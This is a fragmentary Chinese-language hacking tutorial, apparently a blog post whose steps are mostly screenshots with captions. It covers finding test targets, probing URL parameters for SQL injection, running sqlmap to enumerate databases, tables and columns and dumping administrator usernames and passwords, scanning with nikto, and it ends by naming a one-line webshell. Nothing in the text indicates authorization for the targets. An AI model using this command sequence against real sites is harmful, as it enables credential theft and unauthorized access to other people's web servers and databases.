SQL注入,WEB扫描,寻找测试目标,注入后台

SQL注入,WEB扫描,寻找测试目标,注入后台_第1张图片SQL注入,WEB扫描,寻找测试目标,注入后台_第2张图片SQL注入,WEB扫描,寻找测试目标,注入后台_第3张图片SQL注入,WEB扫描,寻找测试目标,注入后台_第4张图片

?ID=13%27              //整形数字

?ID=13 and 1-1       //页面正常显示

终端里打上:sqlmap -u  后面网址          -u//目标

--dbs  --current-user        //两个参数

windows 2003   //操作系统  ,    IIS6.0   // 服务器,   ASP //外部应用,microsoft-access  //数据库

sqlmap -u  网址  ?ID=13  --tables //采写表明

最大线程数提示,输入:10

SQL注入,WEB扫描,寻找测试目标,注入后台_第5张图片查询3186选项

SQL注入,WEB扫描,寻找测试目标,注入后台_第6张图片查找到一个表叫:news

SQL注入,WEB扫描,寻找测试目标,注入后台_第7张图片

查找表明结束,查找到:news-uname表。

sqlmap -u  网址  ?ID=13 -T  //T参数  uname  //自定表明  --columns //参数,uname表的列名

SQL注入,WEB扫描,寻找测试目标,注入后台_第8张图片SQL注入,WEB扫描,寻找测试目标,注入后台_第9张图片SQL注入,WEB扫描,寻找测试目标,注入后台_第10张图片


sqlmap -u  网址  ?ID=13  -T   uname表的列名  -C  //C获取数据列名  login_name.pass.username    //多个列名 --dump  获取数据选项

测试数字型注入点:

SQL注入,WEB扫描,寻找测试目标,注入后台_第11张图片


网址 ?id=1%27

sqlmap -u 网址  --dbs //查看所有的数据库  --current -user


SQL注入,WEB扫描,寻找测试目标,注入后台_第12张图片数据库



sqlmap -u 网址 --dbms mysql -D //  指定数据库名称 cmxt  --tables  //猜接一下段名



SQL注入,WEB扫描,寻找测试目标,注入后台_第13张图片

sqlmap -u 网址 --dbms mysql   -T  //  指定数据库名称  admin  --columns


SQL注入,WEB扫描,寻找测试目标,注入后台_第14张图片

SQL注入,WEB扫描,寻找测试目标,注入后台_第15张图片

sqlmap -u 网址 --dbms mysql   -T  //  指定数据库名称  admin  -C user.pwd --dump

SQL注入,WEB扫描,寻找测试目标,注入后台_第16张图片




终端输入:nikto -host  //host参数  网址

SQL注入,WEB扫描,寻找测试目标,注入后台_第17张图片

尝试一下,不行换这个

SQL注入,WEB扫描,寻找测试目标,注入后台_第18张图片

有文件的索引SQL注入,WEB扫描,寻找测试目标,注入后台_第19张图片魔板信息

CSS文件

SQL注入,WEB扫描,寻找测试目标,注入后台_第20张图片代理服务器SQL注入,WEB扫描,寻找测试目标,注入后台_第21张图片

SQL注入,WEB扫描,寻找测试目标,注入后台_第22张图片


SQL注入,WEB扫描,寻找测试目标,注入后台_第23张图片删掉

SQL注入,WEB扫描,寻找测试目标,注入后台_第24张图片

SQL注入,WEB扫描,寻找测试目标,注入后台_第25张图片2222目录

SQL注入,WEB扫描,寻找测试目标,注入后台_第26张图片SQL注入,WEB扫描,寻找测试目标,注入后台_第27张图片关闭

SQL注入,WEB扫描,寻找测试目标,注入后台_第28张图片

一句话木马






你可能感兴趣的:(SQL注入,WEB扫描,寻找测试目标,注入后台)